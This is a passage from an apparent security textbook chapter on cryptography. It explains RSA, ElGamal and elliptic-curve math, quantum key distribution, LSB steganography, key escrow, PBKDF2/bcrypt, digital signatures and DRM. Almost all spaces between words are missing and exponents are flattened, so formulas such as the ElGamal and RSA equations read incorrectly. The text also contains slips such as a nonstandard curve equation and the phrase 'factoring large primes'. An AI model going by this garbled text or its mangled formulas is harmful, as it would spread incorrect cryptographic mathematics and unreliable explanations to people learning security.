Cistheoutputblockofciphertextmatchingtheblocklengthoftheinputmessage,M.Todecryptamessage,takeciphertext,C,andusethisfunction:
Mi=CiDmod(P*Q)
Theuseofthesecondkeyretrievestheplaintextofthemessage.Thisisasimplefunction,butitssecurityhaswithstoodthetestofmore
than20yearsofanalysis.ConsideringtheeffectivenessofRSA’ssecurityandtheabilitytohavetwokeys,whyaresymmetricencryptionalgorithmsneededatall?Theanswerisspeed.RSAinsoftwarecanbe100timesslowerthanDES,andinhardwareitcanbeevenslower.RSAcanbeusedtoperformbothregularencryptionanddigital
signatures.Digitalsignaturestrytoduplicatethefunctionalityofaphysicalsignatureonadocumentusingencryption.Typically,RSAandtheotherpublickeysystemsareusedinconjunctionwithsymmetrickeycryptography.Publickey,theslowerprotocol,isusedtoexchangethesymmetrickey(orsharedsecret),andthenthecommunicationusesthefastersymmetrickeyprotocol.Thisprocessisknownaselectronickeyexchange.SincethesecurityofRSAisbaseduponthesupposeddifficultyof
factoringlargenumbers,themainweaknessesareintheimplementationsoftheprotocol.Untilrecently,RSAwasapatentedalgorithm,butitwasadefactostandardformanyyears.
ElGamalElGamalcanbeusedforbothencryptionanddigitalsignatures.TaherElGamaldesignedthesystemintheearly1980s.Thissystemwasneverpatentedandisfreeforuse.ItisusedastheU.S.governmentstandardfordigitalsignatures.Thesystemisbaseduponthedifficultyofcalculatingdiscrete
logarithmsinafinitefield.Threenumbersareneededtogenerateakeypair.User1choosesaprime,P,andtworandomnumbers,FandD.FandDshouldbothbelessthanP.Thenuser1cancalculatethepublickeyA:
A=DFmodPThenA,D,andParesharedwiththeseconduser,withFbeingtheprivatekey.Toencryptamessage,M,arandomkey,k,ischosenthatisrelativelyprimetoP–1.Then,
C1=DkmodP
C2=AkMmodP
C1andC2makeuptheciphertext.Decryptionisdoneby
M=C2/C1FmodP
ElGamalusesadifferentfunctionfordigitalsignatures.Tosignamessage,M,onceagainchoosearandomvaluekthatisrelativelyprimetoP–1.Then,
C1=DkmodP
C2=(M–C1*F)/k(modP–1)
C1concatenatedtoC2isthedigitalsignature.ElGamalisaneffectivealgorithmandhasbeeninuseforsometime.It
isusedprimarilyfordigitalsignatures.Likeallasymmetriccryptography,itisslowerthansymmetriccryptography.
ECCEllipticcurvecryptography(ECC)worksonthebasisofellipticcurves.AnellipticcurveisasimplefunctionthatisdrawnasagentlyloopingcurveontheX,Yplane.Ellipticcurvesaredefinedbythisequation:
y2=x3+ax2+bEllipticcurvesworkbecausetheyhaveaspecialproperty—youcanaddtwopointsonthecurvetogetherandgetathirdpointonthecurve,asshownintheillustration.
Forcryptography,theellipticcurveworksasapublickeyalgorithm.Usersagreeonanellipticcurveandafixedcurvepoint.Thisinformationisnotasharedsecret,andthesepointscanbemadepublicwithoutcompromisingthesecurityofthesystem.User1thenchoosesasecretrandomnumber,K1,andcomputesapublickeybaseduponapointonthecurve:
P1=K1*F
User2performsthesamefunctionandgeneratesP2.Nowuser1cansenduser2amessagebygeneratingasharedsecret:
S=K1*P2User2cangeneratethesamesharedsecretindependently:
S=K2*P1Thisistruebecause
K1*P2=K1*(K2*F)=(K1*K2)*F=K2*(K1*F)=K2*P1Thesecurityofellipticcurvesystemshasbeenquestioned,mostly
becauseoflackofanalysis.However,allpublickeysystemsrelyonthedifficultyofcertainmathproblems.Itwouldtakeabreakthroughinmathforanyofthementionedsystemstobeweakeneddramatically,butresearchhasbeendoneabouttheproblemsandhasshownthattheellipticcurveproblemhasbeenmoreresistanttoincrementaladvances.Again,aswithallcryptographyalgorithms,onlytimewilltellhowsecuretheyreallyare.ThebigbenefittoECCsystemsisthattheyrequirelesscomputingpowerforagivenbitstrength.ThismakesECCidealforuseinlow-powermobiledevices.Thesurgeinmobileconnectivityhasledtosecurevoice,e-mail,andtextapplicationsthatuseECCandAESalgorithmstoprotectauser’sdata.EllipticcurvefunctionscanbeusedaspartofaDiffie-Hellmankey
exchange,andwhenused,themethodisreferredtoasEllipticCurveDIffie-Hellman(ECDH).ThistechniquecanprovidetheadvantagesofellipticcurveandthefunctionalityofDiffie-Hellman.
AsymmetricEncryptionSummaryAsymmetricencryptioncreatesthepossibilityofdigitalsignaturesandalsocorrectsthemainweaknessofsymmetriccryptography.Theabilitytosendmessagessecurelywithoutsendersandreceivershavinghadpriorcontacthasbecomeoneofthebasicconcernswithsecurecommunication.Digitalsignatureswillenablefasterandmoreefficientexchangeofallkindsofdocuments,includinglegaldocuments.Withstrongalgorithms
andgoodkeylengths,securitycanbeassured.
Symmetricvs.AsymmetricBothsymmetricandasymmetricencryptionmethodshaveadvantagesanddisadvantages.Symmetricencryptiontendstobefaster,islesscomputationallyinvolved,andisbetterforbulktransfers.Butitsuffersfromakeymanagementprobleminthatkeysmustbeprotectedfromunauthorizedparties.Asymmetricmethodsresolvethekeysecrecyissuewithpublickeys,butaddsignificantcomputationalcomplexitythatmakesthemlesssuitedforbulkencryption.Bulkencryptioncanbedoneusingthebestofbothsystems,byusing
asymmetricencryptiontopassasymmetrickey.Byaddinginephemeralkeyexchange,youcanachieveperfectforwardsecrecy,discussedlaterinthechapter.Digitalsignatures,ahighlyusefultool,arenotpracticalwithoutasymmetricmethods.
QuantumCryptographyCryptographyistraditionallyaveryconservativebranchofinformationtechnology.Itreliesonproventechnologiesanddoesitsbesttoresistchange.Abignewtopicinrecentyearshasbeenquantumcryptography.Quantumcryptographyisbasedonquantummechanics,principallysuperpositionandentanglement.Adiscussionofquantummechanicsisbeyondthescopeofthistext,buttheprinciplewearemostconcernedwithinregardtocryptographyisthatinquantummechanics,themeasuringofdatadisturbsthedata.Whatthismeanstocryptographersisthatitiseasytotellifamessagehasbeeneavesdroppedonintransit,allowingpeopletoexchangekeydatawhileknowingthatthedatawasnotinterceptedintransit.Thisuseofquantumcryptographyiscalledquantumkeydistribution.Thisiscurrentlytheonlycommercialuseofquantumcryptography,andalthoughthereareseveralmethodsforsendingthekey,theyalladheretothesameprinciple.Keybitsaresentandthencheckedat
theremoteendforinterception,andthenmorekeybitsaresentusingthesameprocess.Onceanentirekeyhasbeensentsecurely,symmetricencryptioncanthenbeused.Theotherfieldofresearchinvolvingquantummechanicsand
cryptographyisquantumcryptanalysis.Aquantumcomputeriscapableoffactoringlargeprimesexponentiallyfasterthananormalcomputer,potentiallymakingtheRSAalgorithm,andanysystembaseduponfactoringprimenumbers,insecure.Thishasledtoresearchincryptosystemsthatarenotvulnerabletoquantumcomputations,afieldknownaspost-quantumcryptography.
SteganographySteganography,anoffshootofcryptographytechnology,getsitsmeaningfromtheGreekwordsteganos,meaningcovered.Invisibleinkplacedonadocumenthiddenbyinnocuoustextisanexampleofasteganographicmessage.Anotherexampleisatattooplacedonthetopofaperson’shead,visibleonlywhentheperson’shairisshavedoff.Hiddenwritinginthecomputeragereliesonaprogramtohidedata
insideotherdata.Themostcommonapplicationistheconcealingofatextmessageinapicturefile.TheInternetcontainsmultiplebillionsofimagefiles,allowingahiddenmessagetobelocatedalmostanywherewithoutbeingdiscovered.Becausenotalldetectionprogramscandetecteverykindofsteganography,tryingtofindthemessageinanInternetimageisakintoattemptingtofindaneedleinahaystackthesizeofthePacificOcean;evenaGooglesearchforsteganographyreturnsthousandsofimages.
Thenatureoftheimagefilesalsomakesahiddenmessagedifficulttodetect.Whileitismostcommontohidemessagesinsideimages,theycanalsobehiddeninvideoandaudiofiles.Theadvantagetosteganographyovertheuseofencryptionaloneisthat
themessagesdonotattractattention,andthisdifficultyindetectingthe
hiddenmessageprovidesanadditionalbarriertoanalysis.Thedatathatishiddeninasteganographicmessageisfrequentlyalsoencrypted,sothatifitisdiscovered,themessagewillremainsecure.Steganographyhasmanyusesbutthemostpublicizedusesaretohideillegalmaterial,oftenpornography,orallegedlyforcovertcommunicationbyterroristnetworks.Steganographicencodingcanbeusedinmanywaysandthroughmany
differentmedia.Coveringthemallisbeyondthescopeforthisbook,butwewilldiscussoneofthemostcommonwaystoencodeintoanimagefile,LSBencoding.LSB,LeastSignificantBit,isamethodofencodinginformationintoanimagewhilealteringtheactualvisualimageaslittleaspossible.Acomputerimageismadeupofthousandsormillionsofpixels,alldefinedby1’sand0’s.IfanimageiscomposedofRedGreenBlue(RGB)values,eachpixelhasanRGBvaluerepresentednumericallyfrom0to255.Forexample,0,0,0isblack,and255,255,255iswhite,whichcanalsoberepresentedas00000000,00000000,00000000forblackand11111111,11111111,11111111forwhite.Givenawhitepixel,editingtheleastsignificantbitofthepixelto11111110,11111110,11111110changesthecolor.Thechangeincolorisundetectabletothehumaneye,butinanimagewithamillionpixels,thiscreatesa125KBareainwhichtostoreamessage.SomepopularsteganographydetectiontoolsincludeStegdetect,
StegSecret,StegSpy,andthefamilyofSARCtools.Allofthesetoolsusedetectiontechniquesbaseduponthesameprinciple,patterndetection.Bylookingforknownsteganographicencodingschemesorartifacts,theycanpotentiallydetectembeddeddata.Additionally,steganographyinsertiontoolscanbeusedtoattempttodecodeimageswithsuspectedhiddenmessages.InvisibleInkisasmallprogramforsteganographicinsertionofmessagesandthentheextractionofthosemessages,asillustratedhere.
CryptographyAlgorithmUse
Theuseofcryptographicalgorithmsgrowseveryday.Moreandmoreinformationbecomesdigitallyencodedandplacedonline,andallofthisdataneedstobesecured.Thebestwaytodothatwithcurrenttechnologyistouseencryption.Thissectionconsiderssomeofthetaskscryptographicalgorithmsaccomplishandthoseforwhichtheyarebestsuited.Securityistypicallydefinedasaproductoffivecomponents:confidentiality,integrity,availability,authentication,andnonrepudiation.Encryptionaddressesallofthesecomponentsexceptavailability.Keyescrowwillbeoneofthemostimportanttopicsasinformationbecomesuniversallyencrypted;otherwise,everyonemaybeleftwithuselessdata.Digitalrightsmanagementandintellectualpropertyprotectionarealsoplaceswhereencryptionalgorithmsareheavilyused.Digitalsignaturescombineseveralalgorithmstoprovidereliableidentificationinadigitalform.
ConfidentialityConfidentialitytypicallycomestomindwhenthetermsecurityisbroughtup.Confidentialityistheabilitytokeepsomepieceofdataasecret.Inthedigitalworld,encryptionexcelsatprovidingconfidentiality.Inmostcases,symmetricencryptionisfavoredbecauseofitsspeedandbecausesomeasymmetricalgorithmscansignificantlyincreasethesizeoftheobjectbeingencrypted.Asymmetriccryptographyalsocanbeusedtoprotectconfidentiality,butitssizeandspeedmakeitmoreefficientatprotectingtheconfidentialityofsmallunitsfortaskssuchaselectronickeyexchange.Inallcases,thestrengthofthealgorithmsandthelengthofthekeysensurethesecrecyofthedatainquestion.
IntegrityIntegrity,betterknownasmessageintegrity,isacrucialcomponentofmessagesecurity.Whenamessageissent,boththesenderandrecipientneedtoknowthatthemessagewasnotalteredintransmission.Thisis
especiallyimportantforlegalcontracts—recipientsneedtoknowthatthecontractshavenotbeenaltered.Signersalsoneedawaytovalidatethatacontracttheysignwillnotbealteredinthefuture.
Messageintegritywillbecomeincreasinglyimportantasmorecommerceisconducteddigitally.Theabilitytoindependentlymakesurethatadocumenthasnotbeentamperedwithisveryimportanttocommerce.Moreimportantly,oncethedocumentis“signed”withadigitalsignature,itcannotberefutedthatthepersoninquestionsignedit.
Integrityisprovidedviaone-wayhashfunctionsanddigitalsignatures.Thehashfunctionscomputethemessagedigests,andthisguaranteestheintegrityofthemessagebyallowingeasytestingtodeterminewhetheranypartofthemessagehasbeenchanged.Themessagenowhasacomputedfunction(thehashvalue)totelltheuserstoresendthemessageifitwasinterceptedandinterferedwith.Thishashvalueiscombinedwithasymmetriccryptographybytakingthemessage’shashvalueandencryptingitwiththeuser’sprivatekey.Thisletsanyonewiththeuser’spublickeydecryptthehashandcompareittothelocallycomputedhash,notonlyensuringtheintegrityofthemessagebutpositivelyidentifyingthesender.
AuthenticationAuthenticationisthematchingofausertoanaccountthroughpreviouslysharedcredentials.Thisinformationmustbeprotectedandacombinationofcryptographicmethodsarecommonlyemployed.Fromhashingtokeystretchingtoencryptionanddigitalsignatures,multipletechniquesareusedaspartoftheoperationsinvolvedinauthentication.
TryThis!
DocumentIntegrityDownloadahashcalculatorthatworksonyouroperatingsystem,suchasSlavaSoftHashCalc,availableatwww.slavasoft.com/hashcalc/index.htm.Thencreateasimpledocumentfilewithanytextthatyouprefer.Saveit,andthenusethehashingprogramtogeneratethehashandsavethehashvalue.Noweditthefile,evenbysimplyinsertingasingleblankspace,andresaveit.Recalculatethehashandcompare.
NonrepudiationAnitemofsomeconfusion,theconceptofnonrepudiationisactuallyfairlysimple.Nonrepudiationmeansthatthemessagesendercannotlaterdenythattheysentthemessage.Thisisimportantinelectronicexchangesofdata,becauseofthelackofface-to-facemeetings.Nonrepudiationisbaseduponpublickeycryptographyandtheprincipleofonlyyouknowingyourprivatekey.Thepresenceofamessagesignedbyyou,usingyourprivatekey,whichnobodyelseshouldknow,isanexampleofnonrepudiation.Whenathirdpartycancheckyoursignatureusingyourpublickey,thatdisprovesanyclaimthatyouwerenottheonewhoactuallysentthemessage.Nonrepudiationistiedtoasymmetriccryptographyandcannotbeimplementedwithsymmetricalgorithms.
TechTip
HOTPAnHMAC-basedOne-TimePassword(HOTP)algorithmisakeycomponentoftheOpenAuthenticationInitiative(OATH).YubiKeyisahardwareimplementationofHOTPthathassignificantuse.
CipherSuitesInmanyapplications,theuseofcryptographyoccursasacollectionoffunctions.Differentalgorithmscanbeusedforauthentication,
encryption/decryption,digitalsignatures,andhashing.Thetermciphersuitereferstoanarrangedgroupofalgorithms.Forinstance,TLShasapublishedTLSCipherSuiteRegistryatwww.iana.org/assignments/tls-parameters/tls-parameters.xhtml.
Strongvs.WeakCiphersThereisawiderangeofciphers,someoldandsomenew,eachwithitsownstrengthsandweaknesses.Overtime,newmethodsandcomputationalabilitieschangetheviabilityofciphers.Theconceptofstrongversusweakciphersisanacknowledgmentthat,overtime,cipherscanbecomevulnerabletoattacks.Theapplicationorselectionofciphersshouldtakeintoconsiderationthatnotallciphersarestillstrong.Whenselectingacipherforuse,itisimportanttomakeanappropriatechoice.
KeyExchangeCryptographicmechanismsusebothanalgorithmandakey,withthekeyrequiringcommunicationbetweenparties.Insymmetricencryption,thesecrecydependsuponthesecrecyofthekey,soinsecuretransportofthekeycanleadtofailuretoprotecttheinformationencryptedusingthekey.Keyexchangeisthecentralfoundationalelementofasecuresymmetricencryptionsystem.Maintainingthesecrecyofthesymmetrickeyisthebasisofsecretcommunications.Inasymmetricsystems,thekeyexchangeproblemisoneofkeypublication.Becausepublickeysaredesignedtobeshared,theproblemisreversedfromoneofsecrecytooneofpublicity.Earlykeyexchangeswereperformedbytrustedcouriers.Peoplecarried
thekeysfromsenderstoreceivers.Onecouldconsiderthisformofkeyexchangetobetheultimateinout-of-bandcommunication.Withtheadventofdigitalmethodsandsomemathematicalalgorithms,itispossibletopasskeysinasecurefashion.Thiscanoccurevenwhenallpacketsaresubjecttointerception.TheDiffie-Hellmankeyexchangeisoneexampleofthistypeofsecurekeyexchange.TheDiffie-Hellmankeyexchangedependsupontworandomnumbers,eachchosenbyoneoftheparties,and
keptsecret.Diffie-Hellmankeyexchangescanbeperformedin-band,andevenunderexternalobservation,asthesecretrandomnumbersareneverexposedtooutsideparties.
KeyEscrowTheimpressivegrowthoftheuseofencryptiontechnologyhasledtonewmethodsforhandlingkeys.Encryptionisadeptathidingallkindsofinformation,andwithprivacyandidentityprotectionbecomingmoreofaconcern,moreinformationisencrypted.Thelossofakeycanhappenforamultitudeofreasons:itmightsimplybelost,thekeyholdermightbeincapacitatedordead,softwareorhardwaremightfail,andsoon.Inmanycases,thatinformationislockedupuntilthecryptographycanbebroken,and,asyouhaveread,thatcouldbemillennia.Thishasraisedthetopicofkeyescrow,orkeepingacopyoftheencryptionkeywithatrustedthirdparty.Theoretically,thisthirdpartywouldonlyreleaseyourkeytoyouoryourofficialdesignateontheeventofyourbeingunabletogetthekeyyourself.However,justastheoldsayingfromBenjaminFranklingoes,“Threemaykeepasecretiftwoofthemaredead.”Anytimemorethanonecopyofthekeyexists,thesecurityofthesystemisbroken.Theextentoftheinsecurityofkeyescrowisasubjectopentodebate,andwillbehotlycontestedintheyearstocome.
TechTip
KeyEscrowHasBenefitsandHazardsKeyescrowcansolvemanyoftheproblemsthatresultwhenakeyislostorbecomesinaccessible,allowingaccesstodatathatotherwisewouldbeimpossibletoaccesswithoutkeyescrow,butitcanopenupprivateinformationtounauthorizedaccess.
Additionally,withcomputertechnologybeingminiaturizedintosmartphonesandotherrelativelyinexpensivedevices,criminalsandother
ill-willedpeoplehavebegunusingcryptographytoconcealcommunicationsandbusinessdealingsfromlawenforcementagencies.Becauselawenforcementagencieshavenotbeenabletobreaktheencryptioninmanycases,governmentagencieshavebegunaskingformandatorykeyescrowlegislation.Inthissense,keyescrowisasystembywhichyourprivatekeyiskeptbothbyyouandbythegovernment.Thisallowspeoplewithacourtordertoretrieveyourprivatekeytogainaccesstoanythingencryptedwithyourpublickey.Thedataisessentiallyencryptedbyyourkeyandthegovernmentkey,givingthegovernmentaccesstoyourplaintextdata.Thisprocessissimilartoasearchwarrantofyourhome,butisusedagainstyourcomputerdata.Whetherornotthisishowthingsshouldbeisalsoopentodebate,butitdoesraisetheinterestingpossibilityofencryptionsoftwarethatisincompatiblewithgovernmentkeyescrowbeingbanned.Thelastmajordiscussionforkeyescrowlegislationwasseveralyearsago,buttheprospectremainsouttherewaitingforahighprofilecasetobringencryptionintothespotlight.In2015,manyUSFederalofficialsagaincalledforformsofkeyescrowandbackdoorsinthenameofanti-terrorismandlawenforcement.Theresultofthisnewroundofargumentwilltakeyearstodecidethecorrectbalance.Keyescrowcannegativelyimpactthesecurityprovidedbyencryption,
becausethegovernmentrequiresahuge,complexinfrastructureofsystemstoholdeveryescrowedkey,andthesecurityofthosesystemsislessefficientthanthesecurityofyourmemorizingthekey.However,therearetwosidestothekeyescrowcoin.Withoutapracticalwaytorecoverakeyiforwhenitislostorthekeyholderdies,forexample,someimportantinformationwillbelostforever.Suchissueswillaffectthedesignandsecurityofencryptiontechnologiesfortheforeseeablefuture.
SessionKeysAsessionkeyisasymmetrickeyusedforencryptingmessagesduringacommunicationsession.Itisgeneratedfromrandomseedsandisusedfor
thedurationofacommunicationsession.Whencorrectlygeneratedandpropagatedduringsessionsetup,asessionkeyprovidessignificantlevelsofprotectionduringthecommunicationsessionandalsocanaffordperfectforwardsecrecy(describedlaterinthechapter).Sessionkeysoffertheadvantagesofsymmetricencryption,speed,strength,simplicity,and,withkeyexchangespossibleviadigitalmethods,significantlevelsofautomatedsecurity.
EphemeralKeysEphemeralkeysarecryptographickeysthatareusedonlyonceaftertheyaregenerated.WhenanephemeralkeyisusedaspartoftheDiffie-Hellmanscheme,itformsanEphemeralDiffie-Hellman(EDH)keyexchange.AnEDHmechanismgeneratesatemporarykeyforeachconnection,neverusingthesamekeytwice.Thisprovidesforperfectforwardsecrecy.IftheDiffie-Hellmaninvolvestheuseofellipticcurves,itiscalledEllipticCurveDiffie-HellmanEphemeral(ECDHE).
KeyStretchingKeystretchingisamechanismthattakeswhatwouldbeweakkeysand“stretches”themtomakethesystemmoresecureagainstbrute-forceattacks.Atypicalmethodologyusedforkeystretchinginvolvesincreasingthecomputationalcomplexitybyaddingiterativeroundsofcomputations.Toextendapasswordtoalongerlengthofkey,youcanrunitthroughmultipleroundsofvariable-lengthhashing,eachincreasingtheoutputbybitsovertime.Thismaytakehundredsorthousandsofrounds,butforsingle-usecomputations,thetimeisnotsignificant.Whenonewantstouseabrute-forceattack,theincreaseincomputationalworkloadbecomessignificantwhendonebillionsoftimes,makingthisformofattackmuchmoreexpensive.Thecommonformsofkeystretchingemployedinusetodayinclude
Password-BasedKeyDerivationFunction2andBcrypt.
PBKDF2Password-BasedKeyDerivationFunction2(PBKDF2)isakeyderivationfunctiondesignedtoproduceakeyderivedfromapassword.ThisfunctionusesapasswordorpassphraseandasaltandappliesanHMACtotheinputthousandsoftimes.Therepetitionmakesbrute-forceattackscomputationallyunfeasible.
BcryptBcryptisakey-stretchingmechanismthatusestheBlowfishcipherandsalting,andaddsanadaptivefunctiontoincreasethenumberofiterations.Theresultisthesameasotherkey-stretchingmechanisms(singleuseiscomputationallyfeasible),butwhenattemptingtobrute-forcethefunction,thebillionsofattemptsmakeitcomputationallyunfeasible.
SecrecyPrinciplesThereareseveralconditionsandprinciplesassociatedwithsecrecy.Twoofthese,confusionanddiffusion,arisefromClaudeShannon’sseminalworkincommunicationtheory.Theconceptofentropy,presentedearlier,isfromthesamesource.Whilethesearetheoretical-centricideas,thereareimplementationprinciplesaswell.Perfectforwardsecrecyisoneoftheseasitappliestofuturemessagesecrecy.
ConfusionConfusionisaprincipletoaffecttherandomnessofanoutput.Theconceptisoperationalizedbyensuringthateachcharacterofciphertextdependsonseveralpartsofthekey.Confusionplacesaconstraintontherelationshipbetweentheciphertextandthekeyemployed,forcinganeffectthatincreasesentropy.
DiffusionDiffusionisaprinciplethatthestatisticalanalysisofplaintextand
ciphertextresultsinaformofdispersionrenderingonestructurallyindependentoftheother.Inplainterms,achangeinonecharacterofplaintextshouldresultinmultiplechangesintheciphertextinamannerthatchangesinciphertextdonotrevealinformationastothestructureoftheplaintext.
PerfectForwardSecrecyPerfectforwardsecrecyisapropertyofapublickeysysteminwhichakeyderivedfromanotherkeyisnotcompromisedeveniftheoriginatingkeyiscompromisedinthefuture.Thisisespeciallyimportantinsessionkeygeneration,wherethecompromiseoffuturecommunicationsessionsmaybecomecompromised;ifperfectforwardsecrecywerenotinplace,thenpastmessagesthathadbeenrecordedcouldbedecrypted.
TransportEncryptionTransportencryptionisusedtoprotectdatathatisinmotion.Whendataisbeingtransportedacrossanetwork,itisatriskofinterception.AnexaminationoftheOSInetworkingmodelshowsalayerdedicatedtotransport,andthisabstractioncanbeusedtomanageend-to-endcryptographicfunctionsforacommunicationchannel.WhenutilizingtheTCP/IPprotocol,TLSisthepreferredmethodofmanagingthesecurityatthetransportlevel.
DigitalSignaturesDigitalsignatureshavebeentoutedasthekeytotrulypaperlessdocumentflow,andtheydohavepromiseforimprovingthesystem.Digitalsignaturesarebasedonbothhashingfunctionsandasymmetriccryptography.Bothencryptionmethodsplayanimportantroleinsigningdigitaldocuments.Unprotecteddigitaldocumentsareveryeasyforanyonetochange.Ifadocumentiseditedafteranindividualsignsit,itisimportantthatanymodificationcanbedetected.Toprotectagainst
documentediting,hashingfunctionsareusedtocreateadigestofthemessagethatisuniqueandeasilyreproduciblebybothparties.Thisensuresthatthemessageintegrityiscomplete.
Digitalsignaturesprovideameansofverifyingauthenticityandintegrityofamessage:youknowbothwhothesenderisandthatthemessagehasnotbeenaltered.Byitself,adigitalsignaturedoesnotprotectthecontentsfromunauthorizedreading.
Adigitalsignatureisacryptographicimplementationdesignedtodemonstrateauthenticityandidentityassociatedwithamessage.Usingpublickeycryptography,adigitalsignatureallowstraceabilitytothepersonsigningthemessagethroughtheuseoftheirprivatekey.Theadditionofhashcodesallowsfortheassuranceofintegrityofthemessageaswell.Theoperationofadigitalsignatureisacombinationofcryptographicelementstoachieveadesiredoutcome.ThestepsinvolvedindigitalsignaturegenerationanduseareillustratedinFigure5.11.Themessagetobesignedishashed,andthehashisencryptedusingthesender’sprivatekey.Uponreceipt,therecipientcandecryptthehashusingthesender’spublickey.Ifasubsequenthashingofthemessagerevealsanidenticalvalue,twothingsareknown:First,themessagehasnotbeenaltered.Second,thesenderpossessedtheprivatekeyofthenamedsender,soispresumablythesenderhim-orherself.
•Figure5.11Digitalsignatureoperation
Adigitalsignaturedoesnotbyitselfprotectthecontentsofthemessagefrominterception.Themessageisstillsentintheclear,soifconfidentialityofthemessageisarequirement,additionalstepsmustbetakentosecurethemessagefromeavesdropping.Thiscanbedonebyencryptingthemessageitself,orbyencryptingthechanneloverwhichitistransmitted.
DigitalRightsManagementDigitalrightsmanagement(DRM)istheprocessforprotectingintellectualpropertyfromunauthorizeduse.Thisisabroadarea,butthemostconcentratedfocusisonpreventingpiracyofsoftwareordigitalcontent.Beforeeasyaccesstocomputers,orthe“digitalrevolution,”thecontentwecameincontactwithwasanalogorprintbased.Whileitwaspossibletocopythiscontent,itwasdifficultandtime-consumingtodoso,andusuallyresultedinalossofquality.Itwasalsomuchmoredifficulttosend1000pagesofahandwrittencopyofabooktoEurope,forexample.ComputersandtheInternethavemadesuchtaskstrivial,andnowitisveryeasytocopyadocument,music,orvideoandquicklysenditthousandsofmilesaway.Cryptographyhasenteredthefrayasasolutiontoprotectdigitalrights,
thoughitiscurrentlybetterknownforitsfailuresthanitssuccesses.TheDVDContentScrambleSystem(CSS)wasanattempttomakeDVDsimpossibletocopybycomputer.CSSusedanencryptionalgorithmthatwaslicensedtoeveryDVDplayer;however,creativeprogrammerswereabletoretrievethekeytothisalgorithmbydisassemblingasoftware-basedDVDplayer.CSShasbeenreplacedbytheAdvancedAccessContentSystem(AACS),whichisusedonthenext-generationBlu-raydiscs.ThissystemencryptsvideocontentviathesymmetricAESalgorithmwithoneormorekeys.Severaldecryptionkeyshavebeen
crackedandreleasedtotheInternet,allowingpiratestofreelycopytheprotectedcontent.ThemusicandcomputergameindustrieshavealsoattemptedseveraldifferentDRMapplications,butnearlyallofthesehaveeventuallybeencracked,allowingpiracy.AcommonexampleofDRMthatismostlysuccessfulisthebroadcast
streamofdigitalsatelliteTV.SincethesignalisbeamedfromspacetoeveryhomeinNorthAmerica,thesatelliteTVprovidermustbeabletoprotectthesignalsothatitcanchargepeopletoreceiveit.Smartcardsareemployedtosecurelyholdthedecryptionkeysthatallowaccesstosomeorallofthecontentinthestream.Thissystemhasbeencrackedseveraltimes,allowingasubsetofusersfreeaccesstothecontent;however,thesatelliteTVproviderslearnedfromtheirearlymistakesandupgradednewsmartcardstocorrecttheoldproblems.DRMwillalsobecomeveryimportantintheindustryofSoftwareasa
Service(SaaS).SimilartocompaniesthatprovidesatelliteTVservice,companiesthatprovideSaaSrelyonasubscriptionbasisforprofitability.Ifsomeonecouldpayforasinglelicenseandthendistributethattohundredsofemployees,theproviderwouldsoongooutofbusiness.Manysystemsinthepasthavebeencrackedbecausethekeywashousedinsidethesoftware.Thishaspromptedsomesystemstousespecifichardwaretostoreandprotectthekey.ThesedevicesarecommonlyknownasHardwareSecurityModules,orHSMs.Theyareusuallydesignedtoprotectthekeyinhardwaresothatevenifthedeviceistamperedwith,itwillnotrevealkeymaterial.Smartcardsareoneexampleofthistechnology.AnotherexampleishardwaretokenUSBkeysthatmustbeinsertedintothemachineforthesoftwaretodecryptandrun.Placingthekeysinhardwaremakesanattacktoretrievethemmuchharder,aconceptthatisemployedintheTrustedPlatformModule;infact,oneoftheprimarycomplaintsagainsttheTPMisitsinabilitytoenforceDRMrestrictions.
CryptographicApplications
Afewapplicationscanbeusedtoencryptdataconvenientlyonyourpersonalcomputer.(Thisisbynomeansacompletelistofeveryapplication.)PrettyGoodPrivacy(PGP)ismentionedinthisbookbecauseitisausefulprotocolsuite.CreatedbyPhilipZimmermannin1991,itpassedthroughseveralversionsthatwereavailableforfreeunderanoncommerciallicense.PGPisnowanenterpriseencryptionproduct,acquiredbytheSymantecCorporationin2010.PGPcanbeappliedtopopulare-mailprogramstohandlethemajorityofday-to-dayencryptiontasksusingacombinationofsymmetricandasymmetricencryptionprotocols.OneoftheuniquefeaturesofPGPisitsabilitytousebothsymmetricandasymmetricencryptionmethods,accessingthestrengthsofeachmethodandavoidingtheweaknessesofeachaswell.Symmetrickeysareusedforbulkencryption,takingadvantageofthespeedandefficiencyofsymmetricencryption.Thesymmetrickeysarepassedusingasymmetricmethods,capitalizingontheflexibilityofthismethod.PGP-basedtechnologyisnowsoldaspartofacommercialapplication,withhomeandcorporateversions.
CrossCheckPGPInChapter7youwilllearnsomeadditionaldetailsaboutPGP.Whyistheabilitytouseasymmetricandsymmetricencryptioninthesameprogramimportant?
GnuPG,orGnuPrivacyGuard,isanopensourceimplementationoftheOpenPGPstandard.Thiscommandline–basedtoolisapublickeyencryptionprogramdesignedtoprotectelectroniccommunicationssuchase-mail.ItoperatessimilarlytoPGPandincludesamethodformanagingpublic/privatekeys.Filesystemencryptionisbecomingastandardmeansofprotectingdata
whileinstorage.Evenharddrivesareavailablewithbuilt-inAESencryption.MicrosoftexpandeditsEncryptingFileSystem(EFS),availablesincetheWindows2000operatingsystem,withBitLocker,a
boot-sectorencryptionmethodthatprotectsdatathatwasintroducedwiththeWindowsVistaoperatingsystem.BitLockerisalsousedinWindowsServer2008andtheWindows7andbeyondoperatingsystems.BitLockerutilizesAESencryptiontoencrypteveryfileontheharddriveautomatically.Allencryptionoccursinthebackground,anddecryptionoccursseamlesslywhendataisrequested.ThedecryptionkeycanbestoredintheTPMoronaUSBkey.
DatabaseEncryptionDuepartlytoincreasedregulatoryconcernsandpartlytomoretargetedattacks,databaseshavebeguntooffernativesupportforencryption.Protectingdataatrestintheenterprisefrequentlyinvolvesdatastoredindatabases.Buildingdataprotectionmechanismsintothedatabasesystemsisnotnew(ithasbeenaroundforalongtime),butenterpriseadoptionofthisfunctionalityhasbeenslow.Symmetricencryptionalgorithmssuchas3DESandAESareusedtoencryptdatainternallyinthedatabase.Protectionmechanismsthatcanbemanagedbyrowandbycolumnareincludedinmostmajordatabaseapplications;thechallengeisinconvincingorganizationstousethisprovenprotectionmethodology.Itdoesaddcomplexitytothesystem,butintoday’senvironmentofdatabreachesandcorporateespionage,thecomplexityiseasiertomanagethantheeffectsofadataloss.
UseofProvenTechnologiesWhensettingupacryptographicscheme,itisimportanttouseproventechnologies.Provencryptographiclibrariesandprovencryptographicallycorrectrandomnumbergeneratorsarethefoundationalelementsassociatedwithasolidprogram.Homegrownorcustomelementsintheseareascangreatlyincreaseriskassociatedwithabrokensystem.Developingyourowncryptographicalgorithmsisbeyondtheabilitiesofmostgroups.Algorithmsarecomplexanddifficulttocreate.Anyalgorithmthathasnothadpublicreviewcanhaveweaknessesinthe
